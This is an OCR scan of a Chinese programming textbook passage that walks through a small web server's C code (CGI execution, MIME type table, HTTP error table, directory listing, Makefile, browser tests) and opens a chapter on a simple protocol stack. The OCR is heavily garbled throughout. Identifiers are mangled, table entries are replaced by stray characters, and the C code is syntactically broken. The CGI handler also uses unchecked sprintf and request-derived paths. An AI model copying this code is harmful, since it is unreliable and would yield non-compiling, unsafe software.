/* 获 得 匹配 字符 串 /cgi-bin/ 之 后 的 地 址 */ 
char *arg[ARGNUM]; 
int num = 0; 
char *rpath = wctl->conn.con req.rpath; 
Stat *fs = &wctl->conn.con res.fsate; 
int retval = -1; 


(2) 将 指针 指向 字符 串 CGI 命令 ， 并 找到 之 后 的 “?” 或 者 结束 符 ， 作 为 CGI 命令 的 
字符 串 ， 在 字符 串 末 尾 用 “\0” 填 充 ， 构 成 字符 串 ， 并 与 CGIRoot 共同 生成 一 个 CGI 全 路 
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径 命令 。 
char *pos = command; /* 查 找 CGI 的 命令 */ 
for(;*pos != '?' && *pos !='\0';post++) /* 找 到 命令 末尾 */ 


A NO 

sprintf (rpath, "%s%s",conf para.CGIRoot,command); /* 构 建 全 路 径 */ 

(3) CGI 的 参数 为 紧 跟 CGI 命令 后 “?” 的 字符 串 ， 多 个 变量 之 间 用 “+” 连 接 起 来 。 
所 以 可 以 根据 “+” 的 数量 确定 参数 的 个 数 ， 这 里 假设 参数 最 多 有 16 个 。 参 数 放 在 arg 中 ， 


参数 的 个 数 由 变量 num 确定 。 


/*CGI 的 参数 */ 


Ppost+; 
for(;*pos != '\0' && num < ARGNUM;) 
{ 
arg[num] = pos; 
for(;*pos != '+' && *pos!='\0';pos++) 
if(*pos == '+') 
{ 
*#*pos = '\0'; 
post+; 
numt++;} 


. 
} 
arg[num] = NULL; 
(4) 查看 CGI 命令 的 属性 ， 确 定 不 是 目录 并 且 可 以 执行 。 


/* 命 令 的 属性 */ 
if(stat (rpath, fs)<0) 
{ 


/* 错 误 */ 
res->status = 403; 
retval = -1; 


goto EXITcgiHandler; 
} 
else if((fs->st mode & S IFDIR) == S_IFDIR) 
{ 

/* 是 一 个 目录 , 列 出 目录 下 的 文件 */ 


} 
else if((fs->st mode & S_IXUSR) != S_IXUSR) 
/* 所 指 文件 不 能 执行 */ 
res->status = 403; 
retval = -1; 
goto ExXITcgiHandler; 
} 


(5) 创建 管道 ， 用 于 进程 间 通 信 。 


/* 创 建 进程 间 通 信 的 管道 */ 
int pipe in{[2]; 
int pipe out[2]; 
if (pipe[pipe in] < 0) 
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{ 
res->status = 500; 
retval = -1; 
goto EXITcgiHandler; 
} 


if(pipe[pipe out] < 0) 
| 


res->status = 500; 

retval = -1; 

goto EXITcgiHandler; 
} 


(6) 将 进程 分 又 ， 主 进程 处 理 客户 端的 连接 ，CGI 进程 处 理 CGI 脚本 。 在 主 进 程 中 


关闭 管道 pipe_out 的 写 和 管道 pipe in 的 读 。 


/* 进 程 分 叉 */ 
Lint pid = O08 
pid = fork(); 
if(pid < 0) /* 错 误 */ 
{ 
res->status = 500; 
retval = -1; 
goto EXITcgiHandler; 
} 
else if(pid > 0) /* 父 进程 #/ 
{ 
close (pipe_out [WRITEOUT]) ; 
close (pipe_in[READIN]); 


(7) 主 进程 从 CGI 端的 标准 输出 读 取 数据 ， 并 将 数据 发 送 到 网 络 资源 请 求 的 客户 端 。 


当 CGI 进程 端 结束 后 ， 等 待 其 全 部 子 进程 的 结束 ， 最 后 关闭 管道 。 


int size = 0; 

int end = 0; 
while(size > 0 && !end) 
{ 


size = read(pipe out[READIN], res->res.ptr, sizeof (wctl->conn. 


dres)); /* 读 取 CGI 进程 端 数据 */ 


if(size > 0) 
{ 


send(wctl->conn.cs, res->res.ptr, strlen(res->res.ptr)); 


/* 将 数据 发 送 给 客户 端 */ 
else 
{ 
end = 1; 

} 
} 
wait (&end); /* 等 待 其 子 进程 全 部 结束 */ 
close (pipe_out [READIN]); /* 关 闭 管道 */ 


close (Pipe_in[WRITEOUT]) 
retval = 0; 


} 


(8) 在 CGI 进程 中 ， 先 将 客户 端 发 送 过 来 的 CGI 脚本 及 参数 形成 一 个 字符 串 ， 然 后 将 
pipe_out 管道 的 写 端 和 标准 输出 绑 定 在 一 起 。 这 个 管道 和 主 进程 的 读 端 是 连 在 一 起 的 ， 当 
CGI 进程 的 程序 向 标准 输出 发 送 数据 的 时 候 ， 主 进程 中 会 收 到 其 发 送 的 数据 ， 最 后 执行 
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脚本 。 

Else /* 子 进程 */ 

{ 
char cmdarg[2048]; 
char onearg[2048]; 
char *pos = NULL; 
int i = 0; 
/* 形 成 执行 命令 */ 
memset (onearg, 0, 2048]; 
for(i = 0;i<num;i++) 

sprintf (cmdarg,"%s %s", onearg, arg[i]); 

/* 将 写 入 的 管道 绑 定 到 标注 输出 */ 
close (pipe_out [READIN]); /* 关 闭 无 用 的 读 管道 */ 
dup2 (Pipe_out [WRITEOUT]，1) 7 /* 将 写 管道 绑 定 到 标注 输出 */ 
close (pipe_out [WRITEOUT]) ， /# 关 闭 写 管道 */ 
close (pipe in[WRITEOUT]) 
dup2 (pipe_in[READIN], 0); 
close (pipe_in[READIN]); 
execlp(rpath, arg); /* 执 行 命令 ,命令 的 输出 需要 为 标准 输出 */ 

h， 

EXITcgiHandler: 


return retval; 


} 


18.3.8 ”SHTTPD 支持 HTTP 协议 版 本 的 实现 
服务 器 SHTTPD 支持 的 HTTP 协议 版 本 为 0.9、1.0 和 1.1， 当 协议 的 版 本 不 为 此 范围 


时 ， 返 回 错误 


值 505， 表 示 不 支持 的 服务 器 版 本 。 代 码 如 下 : 


len -= pos -p; 


P = pos; 
sscanf (P， 
"HTTP/S%1Lu.%1lunv 
&req->major, /* 主 版 本 */ 
&req->minor); /* 副 版 本 */ 
if(!((req->major == 0 && req->minor == 9)|| /*0.9*#/ 
(req->major == 1 && req->minor == 0)|| /*1.0*/ 
(req->major == 1 && req->minor == 1))) /*1.1*/ 


retval = 505; 
goto EXITRequest Parse; 


18.3.9 SHTTPD 内 容 类 型 的 实现 
内 容 类 型 表示 服务 器 支持 资源 的 格式 ， 如 文本 格式 、 超 文本 格式 、 流 媒体 的 多 种 格式 


等 。 定 义 的 内 


enum{ 


容 类 型 格式 如 下 : 


MINET HTML, MINET HTM, MINET TXT, MINET CSS, MINET ICO， MINET GIF, 
MINET JPG, MINET JPEG, 
MINET PNG, MINET SVG, MINET TORRENT, MINET WAV, MINET MP3, 
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MINET MID, MINET M3U, MINET RAM, 
MINET RA, MINET DOC, MINET EXE, MINET ZIP, MINET XLS, MINET TGZ, 
MINET TARGZ, MINET TAR, 
MINET GZ， MINET ARJ, MINET RAR, MINET RTF, MINET PDF, MINET SWEF, 
MINET MPG, MINET MPEG, 
MINET ASF, MINET AVI, MINET BMP 
| 
结构 struct mine type 用 于 表示 文件 内 容 的 文件 格式 ， 原 型 如 下 所 示 。 其 中 成 员 
externsion 为 文件 的 扩展 名 ， 即 此 类 型 所 可 能 的 文件 ， 例 如 text/html 类 型 包含 扩展 名 html 
和 htm 两 种 类 型 .成 员 type 表示 类 型 ,其 类 型 值 为 上 面 所 定义 的 枚 举 类 型 变量 。 成 员 ext_len 
表示 扩展 名 的 长 度 ， 方 便 安 全 比较 。 成 员 mine_ type 表示 内 容 的 类 型 ， 此 项 为 RFC 所 定义 
的 类 型 。 


struct mine typet{ 


char *extension; /* 扩 展 名 */ 
int type; /* 类 型 */ 
int ext_ len; /+ 扩展 名 长 度 */ 
char *mime type; /* 内 容 类 型 */ 
} 
builtin mime types[] = { 
{"htmi", MINET HTML, 4, "text/htmln 3 
{"htm", MINET HTM, 3, "text/html" Yh 
EE MINET TXT， 3, "text/plain" hr 
{"css", MINET CSS, 3, "text/css" }， 
Or MINET_ ICO, 3, "image/x-icon" RE 
{"gif", MINET GIF, 3, "image/gif" 这 
{"jpg", MINET JPG, 3, "image/jpeg" | 吕 
{"jpeg", MINET_JPEG, 4, "image/jpeg" }, 
{png MINET_PNG, 3, "image/png" }， 
{"svg", MINET SVG， 3, "image/svg+xml" 9 
{"torrent", MINET_ TORRENT, 7， "application/x-bittorrent" }, 
{"wav", MINET WAV, 3, "audio/x-wav" Rx 
mp MINET MP3, 3, "audio/x-mp3" jr 
Tid MINET MID, 3, "audio/mid" 上 
Tm MINET M3U, 3, "audio/x-mpegurl" 是 
{"ram", MINET RAM, 3, "audio/x-pn-realaudio" jy 
\ 邮 帮 二 -二 MINET_RR， 2, "audio/x-pn-realaudio" jy 
tedoc™s MINET DOC, 3, "application/msword", Fx 
{"exe", MINET EXE, 3, "application/octet-stream" }， 
Nr MINET ZIP, 3, "application/x-zip-compressed" }, 
[sb MINET XLS， 3, "application/excel" ; 
Ey MINET TGZ, 3, "application/x-tar-gz" jr 
和 MINET TARGZ,6, "application/x-tar-gz" 上 
二 站 入 证 并 和 MINET TAR, 3, "application/x-tar" } 
gz MINET GZ, 2, "application/x-gunzip" Ti 
ear MINET ARJ, 3, "application/x-arj-compressed" }， 
卫 了 5 台 拓 于 这 MINET RAR, 3, "application/x-arj-compressed" }, 
eh MINET RTF, 3, "application/rtf" > 
cE MINET PDF, 3, "application/pdf" ys 
WE MINET SWF, 3, "application/x-shockwave-flash" js 
"mpg", MINET MPG, 3, "video/mpeg" } 7 
"mpeg", MINET MPEG, 4, "video/mpeg" }, 
且 帮 二 在 了 MINET ASF, 3, "video/x-ms-asf" I 
a MINET AVI, 3, "video/x-msvideo" }, 
"bmp", MINET BMP, 3, "image/bmp" Yr 
NULL, -1, 0, NULL } 
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函数 Mine_Type() 根 据 输入 的 扩展 名 查找 内 容 类 型 中 的 匹配 项 。 


struct mine type* Mine Type (char *uri, int len, struct worker ctl] *wct1) 
{ 
DBGPRINT ("==>Mine Type\n"); 
ne 0 
char *ext = memchr (uri, '.', len); /* 查 找 扩展 名 的 位 置 */ 
struct mine type *mine = NULL; 
int found = 0; 


ext++; /+ 扩展 名 第 一 个 字 节 位 置 */ 
printf ("uri:%s,len:%d,ext is %d, %s\n",uri,len,ext, ext); 
for (mine = &builtin mime types[i]; mine->extension != NULL; i++) 
/* 在 内 容 类 型 中 找 匹 配 项 */ 
{ 
if(!strncmp (mine->extension, ext, mine->ext len)) 
/* 比 较 扩 展 名 */ 
{ 
found = 1; 
printf ("found it, ext is %s\n",mine->extension); 
break; 
} 
1] 
if(!found) /* 没 有 找到 的 时 候 , 默认 类 型 为 "text/plain"*/ 


mine = &builtin mime types[2]; 
} 
DBGPRINT ("<==Mine Type\n"); 
return mine; 


18.3.10 ”SHTTPD 错误 处 理 的 实现 
服务 器 SHTTPD 支持 错误 值 绝 大 多 数 的 错误 响应 ， 其 错误 代码 定义 如 下 : 


enum{ 
ERROR301=301, ERROR302=302, ERROR303, ERROR304, ERROR305, ERROR307= 
307， 
ERROR400=400, ERROR401, ERROR402, ERROR403, ERROR404, ERROR405, 
ERROR406, 


ERROR407, ERROR408, ERROR409, ERROR410, ERROR411, ERROR412, ERROR413, 
ERROR414, ERROR415, ERROR416, ERROR417, 
ERROR500=500, ERROR501, ERROR502, ERROR503, ERROR504, ERROR505 
}; 
将 错误 代码 的 错误 信息 、 含 义 及 错误 代码 值 构 建 一 个 全 局 的 错误 信息 结构 数组 ， 代 码 
如 下 : 


struct error minef{ 


int error code; /* 错 误 代 码 */ 
char *content; /* 错 误 信 息 */ 
char *mSg; /* 含 义 */ 
}_error http={ 
{ERROR301，"Error: 301",， "永久 移动 " }， 
{ERROR302， "Error: 302"，" 创 建 " }， 
{ERROR303，"Error: 303"，" 观 察 别 的 部 分 " }， 
{ERROR304，"Error: 304"，" 只 读 " }， 


-a 
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ERROR305， "Error: 305"，" 用 户 代 理 " }， 
ERROR307， "Error: 307"，" 临 时 重 发 " ys 
ERROR400，"Error: 400"，" 坏 请 求 " 到 
ERROR401， "Error: 401"，" 未 授权 的 " }， 
ERROR402， "Error: 402"，" 必 要 的 支付 " }， 
ERROR403， "Error: 403"，" 禁 用 " }， 
ERROR404，"Error: 404"，" 没 找到 " }， 
{ERROR405， "Error: 405"，" 不 允许 的 方式 " }， 
ERROR406， "Eror: 406"，" 不 接受 " }， 
ERROR407， "Error: 407"，" 需 要 代理 验证 " )， 
ERROR408， "Error: 408"，" 请 求 超时 " }， 
ERROR409， "Error: 409"，" 冲 突 " }， 
{ERROR410， "Error: 410"，" 停 止 " }， 
{ERROR411，"Error: 411"，" 需 要 的 长 度 " }， 
{ERROR412， "Error: 412"，" 预 处 理 失 败 " Er 
ERROR413，"Error: 413",， "请 求实 体 太 大 " }， 
{ERROR414， "Error: 414"，" 请 求 -URI 太 大 " Ye 


{ERROR415，"Error: 415"，" 不 支持 的 媒体 类 型 "， }， 
{ERROR416， "Error: 416"，" 请 求 的 范围 不 满足 " }， 
{ERROR417， "Error: 417"，" 期 望 失 败 " 


{ERROR500， "Error: 500"，" 服 务 器 内 部 错误 " ji 


{ERROR501， "Error: 501",， "不 能 实现 " }, 
{ERROR502， "Error: 502"，" 坏 网 关 " 于 
{ERROR503， "Error: 503"，" 服 务 不 能 实现 " }， 
{ERROR504， "Error: 504", "网 关 超 时 " 上 
{ERROR505， "Error: 505"，"HTTP 版 本 不 支持 "  }， 
{0, NULL, NULL } 


}; 
错误 类 型 生成 的 方法 为 查找 变量 _error_http 中 与 每 个 状态 值 匹 配 的 项 ， 利 用 此 项 来 构 
建 头 部 信息 。 头 部 信息 的 结构 与 Get 方法 中 的 含义 一 致 。 


int GenerateErLIOLMine (struct WwWOLKker_ct1l * WCt1) 
{ 


struct error mine *err = NULL; /* 错 误 类 型 #/ 

int i = 0; 

forl(err = & error http[i]; /* 轮 询 查 找 类 型 匹配 的 错误 类 型 */ 
err->error code != wctl->conn.con res.status; 
于 二 二 ) 


? 
if (err-> error code!= wctl->conn.con res.status;) 


/* 没 有 找到 的 错误 类 型 为 第 一 个 */ 


€ 
err = & error http[0]; 
1 
snprintf( /* 构 建 信息 头 部 #/ 


wctl->conn.dres, 

sizeof (wctl->conn.dres), 
"HTTP/%lu.%lu sq gSs\r\n" 
"Content-Type:%s\r\n" 
"Content-Length:%d\r\n" 
"\r\n" 

"gs", 

wctl->conn.con req.major, 


sls 
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wctl->conn.con req.minor, 
err-> error code, 
err->msg, 

"text/plain", 

strlen (err->content), 
err->content); 


wctl->conn.con res.cl = strlen(err->content); /* 内 容 长 度 */ 
wctl->conn.con res.fd = -1; /* 无 文件 可 读 */ 
wctl->conn.con res.status = err-> error code; /* 错 误 代 码 */ 


18.3.11 SHTTPD 生成 目录 下 文件 列表 文件 的 实现 


当 客户 端 请 求 的 是 一 个 目录 名 的 时 候 ， 需 要 判断 是 否 当前 目录 下 有 一 个 与 默认 文件 名 
一 致 的 文件 。 如 果 没 有 ， 则 需要 将 当前 目录 下 面 的 所 有 目录 列表 出 来 ， 并 形成 超级 链接 ， 
目录 文件 列表 的 实现 代码 如 下 所 示 。 

(1) 先 打 开 目 录 ， 并 打开 一 个 临时 文件 。 


int GenerateDirFile(struct worker ctl *wctl1) 
{ 
struct conn request *req = &wctl->conn.con req; 
struct conn_ response *res = &wctl->conn.con res; 
char *command = strstr(req->uri, CGISTR) + strlen (CGISTR); 
char *arg[ARGNUM]; 
int num = 0; 
char *rpath = wctl->conn.con req.rpath; 
stat *fs = &wctl->conn.con res.fsate; 
/* 打 开 目 录 */ 
DIR *dir = opendir(rpath); 
if(dir == NULL) 
{ 


/# 错 误 */ 
res->status = 500; 
retval = -1; 


goto ExITgenerateIndex; 


} 

/* 建 立 临时 文件 保存 目录 列表 */ 

File *tmpfile; 

char tmpbuff [2048]; 

int filesize = 0; 

char *uri = wctl->conn.con req.uri; 
tmpfile = tmpfile(); 


(2) 建立 标题 部 分 字符 串 ， 标 题 为 当前 的 URI。 


/* 标 题 部 分 */ 
sprintf (tmpbuff, 
"%S%S3%S3", 
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n<HTML> 
<HEAD><TITLE>", 
uri, 
"</TITLE></HEAD>\n" ); 
fprintf (tmpfile, "%s", tmpbuff); 
filesize += strlen(tmpbuff); 
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目录 下 的 文件 列表 的 格式 为 : 
文件 名 日 期 大 小 
形式 的 东西 ， 先 将 上 述 的 格式 打印 出 来 。 


/* 标 识 部 分 */ 
sprintf (tmpbuff, 
ee 
"<BODY><H1>Index of:", 
uri, 
" </H1> <HR><P><I>Date: </I> <I>Size: </I></P><HR>"); 
fprintf (tmpfile, "%s", tmpbuff); 
filesize += strlen(tmpbuff); 


(3) 下 面 进入 主要 的 部 分 获得 目录 下 面 的 文件 列表 。 

这 个 文件 列表 主要 分 为 3 类 : 一 类 为 “.” 和 “..” 等 特殊 的 目录 ; 另 一 类 为 正常 的 目 
录 ; 最 后 一 类 为 正规 文件 。 其 中 当前 目录 “.” 不 用 显示 ， 而 表示 其 上 层 目录 的 “..” 需 要 
显示 的 将 其 名 称 用 “ 父 目 录 ” 表 示 出 来 。 

对 于 正规 的 文件 需要 获得 文件 的 日 期 和 大 小 等 参数 。 最 后 ， 当 目录 下 所 有 的 文件 凯 历 
完毕 之 后 ， 需 要 更 新 用 于 表示 客户 端 访 问 资源 属性 的 参数 人， 将 它 的 修改 时 间 、 建 立时 间 
等 设置 为 当前 ， 主 要 是 设置 其 大 小 ， 以 便 之 后 进行 访问 。 为 了 防止 出 现 问 题 ， 需 要 将 文件 
的 指针 移 到 文件 的 首部 。 


/* 读 取 目 录 中 的 文件 列表 */ 
struct dirent *de; 

#define PATHLENGTH 2048 
char path [PATHLENGTH]; 
char tmpath [PATHLENGTH]; 
char linkname [PATHLENGTH]; 
struct stat fs; 
strcpy (path, rpath); 
if(rpath[strlen(rpath)]!='/') 
{ 


rpath[strlen (rpath)]='/'; 
hE 
while ((de = readdir(dir)) != NULL) /* 读 取 一 个 文件 */ 
人 

menset (tmpath, 0, sizeof (tmpath)); 

menset (linkname, 0, sizeof (linkname)); 


if(strcmp (de->d name, ".")) /* 不 是 当前 目录 */ 
{ 
if(strcmp (de->d name, "..")) /* 不 是 父 目 录 */ 


{ 
strcpy (linkname, de->d_name); ”/* 将 目录 名 称 作为 链接 名 称 */ 


} 
else/+* 是 父 目录 */ 
t 
strcpy (linkname, "Parent Directory"); 
/* 将 父 目录 作为 链接 名 称 */ 
| 
sprintf (tmpath, "%s%s",path, de->d _ name) 
/* 构 建 当前 文件 的 全 路 径 */ 
stat (tmpath, &fs); /* 获 得 文件 信息 */ 


i 
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if(S_ISDIR(fs.st mode)) /* 是 一 个 目录 */ 


/* 打 印 目录 的 链接 为 目录 名 称 */ 
sprintf (tmpbuff, "<A HREF=\"%s/\">%s/</A><BR>\n", de->d 


name, tmpath); 

| 

else/* 正 常 文件 */ 

{ 
char size_ str[32]; 
off t size int; 
size int = fs.st size; 
if (size int < 1024) 


/* 文 件 大 小 */ 
/* 不 到 1K*/ 


sprintf (size str, "%d bytes", (int) size int); 
else if (size int < 1024*1024) /* 不 到 1M*/ 
sprintf (size str, "%1.2f Kbytes", (float) size int / 


1024) ; 
else/* 其 他 */ 


sprintf (size str, "%]1.2f Mbytes", (float) size int / 


(1024*1024) ); 
/* 输 出 文件 大 小 */ 


sprintf (tmpbuff, "<A HREF=\"%s\">%s</A> (%s)<BR>\n", de-> 
d name, linkname, size int); 


} 
/* 将 形成 的 字符 串 写 入 临时 文件 */ 


fprintf (tmpfile, "%s", tmpbuff); 


filesize += strlen (tmpbuff); 


} 

/* 生 成 临时 的 文件 信息 , 主要 是 文件 大 小 */ 
fs.st ctime = time (NULL); 

fs.st mtime = time (NULL); 

fs.st size = filesize; 
fseek(tmpfile, (long) 0, SEEK SET); 


18.3.12 ”SHTTPD 主 函 数 的 实现 


/* 移 动 文件 指针 到 头 部 */ 


服务 器 SHTTPD 的 主 函数 代码 如 下 , 主要 功能 为 挂 接 SIGINT 信号 、 初始 化 参数 配置 、 


服务 器 套 接 字 初始 操作 ， 然 后 执行 工作 调度 任务 。 


int main(int argc char *argv[]) 


i 


signal (SIGINT, sig int); /* 挂 接 信 号 SIGINT*/ 
Para Init(argc,argv); /* 参 数 初始 化 */ 

int s = do listen(); /* 套 接 字 初 始 化 */ 
Worker ScheduleRun(s); /* 任 务 调度 #/ 


return 0; 


} 


信号 SIGINT 的 处 理 函 数 ， 将 在 用 户 按 Ctrl+C 键 后 ， 调 用 调度 终止 函数 ， 终 止 工作 线 


程 和 调度 线程 ， 退 出 进程 。 
/*SIGINT 信和 号 截取 函数 */ 


static void sig_int(int num) 


{ 
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Worker ScheduleStop(); 
return; 


18.4 SHTTPD 的 编译 、 调 试 和 测试 


本 节 在 之 前 代码 的 基础 上 建立 源 代码 文件 、 建 立 Makefile、 对 文件 进行 编译 ， 然 后 对 
SHTTPD 服务 器 进行 测试 。 


18.4.1 建立 源 文件 


源 文件 主要 有 如 下 几 个 ， 数 据 结构 基本 都 在 shttpd.h 中 放置 ， 配 置 参 数 的 解析 和 获得 
在 shttpd_parameters.c 文件 中 实现 ; 主 函数 在 shttpd.c 中 实现 ; 客户 端 请 求 的 业务 处 理 在 文 
件 shttpd_workerc 中 ; 关于 URI 的 分 析 在 shttpd_uri.c 文件 中 ; 而 文件 shttpd_request.c 中 则 
是 对 客户 端 请 求 的 分 析 ; shttpd_mine.c 中 放置 的 是 请 求 内 容 的 类 别 相关 变量 和 函数 ; 
shttpd_errorc 中 的 代码 为 HTTP 协议 的 错误 处 理 函 数 和 变量 ; CGI 相关 的 函数 放置 在 
shttpd_cgihandle.c 中 。 


shttpd.h /*shttpd 头 文件 */ 

shttpd Parameters.c /* 配 置 文件 和 命令 行 参数 解析 */ 
shttpd.c /* 主 函数 */ 

shttpd worker.c /* 多 客户 端 框 架 */ 

shttpd Drive /*URI 分 析 */ 

shttpd request.c /* 客 户 端 请 求 分 析 */ 

shttpd method.c /* 请 求 方法 处 理 */ 

shttpd mine.c /* 内 容 类 别 */ 

shttpd error.c /* 错 误 处 理 */ 

shttpd cgihandler.c /*CGI 处 理 */ 


18.4.2 制作 Makefile 


将 上 述 文件 最 终生 成 目标 程序 shttpd, 由 于 程序 中 使 用 了 多 线程 ,所 以 需要 链接 pthread 
线程 库 。 


CC = gcc 
CFLAGS = -Wall -9 
LIBS = -lpthread ”# 多 线程 
TARGET = shttpd 
RM = rm -f 
OBJS = shttpd parameters.o shttpd.o shttpd worker.o shttpd uri.o shttpd 
request.o shttpd method.o shttpd mine.o shttpd error.o 
all:$ (OBJS) 
$(CC) -o $ (TARGET) $ (OBJS) $ (LIBS) 
clean: 
$ (RM) $ (TARGET) $ (OBJS) 


18.4.3 制作 执行 文件 
使 用 make 命令 编译 之 后 ， 生 成 目标 文件 shttpd。 


和 


#make 


18.4.4 使 用 不 同 的 浏览 器 测试 服务 器 程序 
建立 如 下 超级 文本 文件 index.html， 将 其 放 到 “/usrlocal/var/www/” 目 录 下 。 


<HTML> 
<title> 


dHTTP 测试 页 面 
</title> 
<BODY> 
<H1> 视 贺 !</H1> 
<P> 如 果 你 看 到 此 信息 , 表明 dHTTP 服务 器 运行 正常 ! </P> 
</BODY> 
</HTML> 


运行 服务 器 ， 不 输入 任何 参数 ， 则 服务 器 会 在 端口 8080 侦 听 ， 网 络 资源 的 根 目 录 为 
“Ausrlocal/var/www/” 本 机 的 人 地址 为 192.168.1.100。 则 访问 Web 服务 器 的 请 求 为 : 

http://192.168.1.100:8080/ 

在 不 同 的 浏览 器 上 测试 上 述 Web 页 面 在 不 同 浏览 器 和 平台 上 的 情况 ，index.html 在 
IE10 上 的 显示 结果 ， 如 图 18.16 所 示 。 


pe™| 


€ | TE EE 大 
祝贺 ! 


如 果 你 看 到 此 信息 ， 表 明 dHTTP 服 务 器 运行 正常 ! 


图 18.16 “使 用 IE 进行 测试 的 页 面 
如 图 18.17 所 示 为 在 FireFox 浏览 器 上 运行 的 情况 。 


dHTTP 测 试 页 面 - Mozilla Firefox 


癌 dHTTP 测 试 页 面 
© |@ 192.168.1.100 "CG| 国 5 计 Q@ 有 合 


祝贺 ! 


如 果 你 看 到 此 信息 ， 表 明 dHTTP 服 务 器 运行 正常 ! 


图 18.17 使 用 FireFox 浏览 器 进行 测试 的 页 面 


二 
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18.5 小 结 


本 章 介 绍 了 一 个 简单 Web 服务 器 SHTTPD 的 创建 过 程 ， 使 用 线程 池 的 方法 实现 ， 
SHTTPD 可 以 访问 静态 网 页 和 执行 CGI 脚本 ,但 是 很 多 地 方 并 不 完善 ， 如 POST 方法 的 实 
现 、 并 行 访问 性 能 不 高 ， 兼 容 性 不 强 等 。 目 前 比较 小 的 Web 服务 器 有 shttpd 等 ， 读 者 可 以 
查阅 相关 的 资料 进行 了 解 。 
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一 个 简单 网 络 协议 栈 的 例子 SIP 


网 络 程序 设计 的 基础 是 网 络 协议 栈 ， 在 Linux 平台 上 应 用 层 的 网 络 程序 通过 系统 调用 
与 Linux 内 核 中 的 网 络 协议 栈 进行 交互 ， 实 现 网 络 数据 的 接收 、 发 送 和 控制 。 本 章 将 介绍 
一 个 应 用 层 的 网 络 协议 栈 的 例子 ， 通 过 本 章 的 内 容 ， 读 者 可 以 对 网 络 协议 栈 的 实现 有 直接 
对 网 络 程序 设计 的 本 质 有 更 深入 的 了 解 。 本 章 主要 对 网 络 协议 栈 SIP 进行 介绍 ， 
主要 包含 以 下 内 容 : 


的 认识 ， 


口 


口 


口 


口 


口 


DO 


SIP 网 络 协议 栈 
数据 、 用 户 接口 
SIP 网 络 协议 栈 


的 功能 定义 ,主要 包含 SIP 网 络 协议 栈 的 基本 功能 、 分 层 方式 处 理 
的 定义 ; 
的 架构 ， 对 SIP 网 络 协议 栈 的 整体 架构 、 层 间 关 系 、 层 次 模型 、 输 


入 和 输出 处 理 进行 介绍 ; 


SIP 网 络 协议 栈 
行 介绍 ; 

SIP 网 络 协议 栈 
据 的 处 理 方式 ; 


的 存储 缓冲 区 , 对 SIP 网 络 协议 栈 的 核心 数据 结构 的 定义 和 实现 进 


的 网 络 接口 层 , 介绍 如 何 实现 一 个 仿真 的 网 络 接口 层 及 接口 层 对 数 


SIP 网 络 协议 栈 的 ARP 层 协议 ， 介 绍 SIP 协议 栈 中 ARP 层 的 作用 和 实现 方式 ; 


SIP 网 络 协议 栈 


的 IP 层 协议 ,介绍 SIP 网 络 协议 栈 中 IP 层 的 实现 方式 ， 对 输入 数 


据 、 输 出 数据 的 处 理 、IP 数据 包 的 分 包 和 组 装 的 实现 方式 进行 介绍 ; 

对 SIP 网 络 协议 栈 的 ICMP 层 的 实现 方式 进行 介绍 ; 

对 SIP 网 络 协议 栈 的 UDP 协议 层 的 实现 方式 进行 介绍 , 并 对 如 bind、connect、send、 
recv 等 主要 的 接口 实现 进行 解析 ; 

对 SIP 网 络 协议 栈 的 协议 无 关 层 进行 介绍 ; 

对 SIP 网 络 协议 栈 的 用 户 接口 层 的 相关 函数 的 实现 方式 进行 介绍 ; 


最 后 介绍 SIP 网 


1 和 


络 协议 栈 的 完善 的 扩展 方式 。 


1 SIP 网 络 协议 栈 的 功能 描述 


SIP 网 络 协议 栈 是 Simple 卫 Stack 的 简称 ， 是 基于 应 用 层 实现 的 一 个 简单 的 网 络 协议 


栈 模型 。SIP 


网 络 协议 栈 的 目的 用 于 展示 网 络 协议 栈 的 架构 ， 向 读者 介绍 网 络 协议 的 细节 


部 分 ， 使 读者 有 一 个 可 以 参考 的 简单 网 络 协议 栈 模型 。 通 过 对 SIP 网 络 协议 栈 的 了 解 可 以 
更 深入 地 了 解 网 络 协议 、 


SIP 网 络 协议 栈 的 基本 功能 描述 


SIP 网 络 协议 栈 符合 网 络 协议 的 标准 ， 主 要 是 对 RFC 标准 的 兼容 。 能 够 对 网 络 数据 进 
行 解析 ， 实 现 所 定义 功能 


19.14.1 


了 解 网 络 协议 栈 实现 时 的 一 些 问 题 。 


E。 SIP 网 络 协议 栈 主要 包含 如 下 几 个 部 分 的 协议 支持 。 


口 


口 
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以 太 网 的 支持 : SIP 网 络 协议 栈 能 够 支持 以 太 网 数据 的 接收 和 发 送 ， 对 接收 到 的 以 
太 网 数据 进行 解释 后 分 发 给 之 后 的 各 个 网 络 层 ， 上 层 发 送 的 数据 增加 以 太 网 的 头 
部 数据 后 发 送 。 

ARP 协议 的 支持 : SIP 网 络 协议 栈 能 够 对 ARP 协议 进行 支持 ， 对 发 送 数据 的 目的 
方 能 够 根据 IP 地 址 查找 对 应 网 卡 的 硬件 地 址 ; 接收 到 网 络 数据 后 能 够 更 新 ARP 
映射 表 而 不 必 再 次 重新 查询 卫 对 应 的 硬件 地 址 ; 对 网 络 上 其 他 主机 的 ARP 请 求 能 
够 合法 地 响应 ， 提 供 本 机 的 硬件 地 址 。 

IP 协议 的 支持 : SIP 网 络 协议 栈 能 够 判断 接收 网 络 数据 IP 层 的 正 误 判 断 ， 支 持 
IPv4; 能 够 根据 IP 层 判断 上 层 协议 的 类 型 进行 转发 ， 对 发 送 的 网 络 数据 能 够 进行 
IP 头 部 的 填充 ，SIP 网 络 协议 栈 对 IP 层 的 数据 支持 发 送 数据 的 分 片 处 理 和 接收 数 
据 的 组 包 操作 。 

ICMP 协议 支持 : SIP 网 络 协议 栈 支 持 ICMP 协议 的 处 理 ， 支 持 回 显 类 型 的 ICMP 
协议 。 

UDP 协议 的 支持 : SIP 网 络 协议 栈 支 持 UDP 协议 ， 提 供 UDP 协议 的 基本 函数 接 
口 ， 支 持 UDP 的 校 验 。 

协议 抽象 层 的 支持 : SIP 网络 协议 栈 支持 多 个 协议 , 在 协议 抽象 层 进行 分 类 ， 按 照 
不 同 的 协议 进行 不 同类 型 的 处 理 ， 可 以 便于 协议 的 增加 和 扩展 。 

用 户 接口 的 支持 : SIP 网 络 协议 栈 提 供 基 本 的 用 户 操作 接口 ， 包 括 IO 接口 和 控制 
接口 。 


19.1.2 SIP 网 络 协议 栈 的 分 层 功能 描述 


SIP 网 络 协议 栈 采 用 浊 辑 上 的 分 层 结构 ， 相 邻 两 层 之 


间 会 有 互相 调用 的 关系 , 间隔 的 各 层 之 间 没有 明显 的 联系 。 
这 种 设计 方式 一 方面 能 够 将 网 络 协议 的 层 间 结 构 和 实现 比 


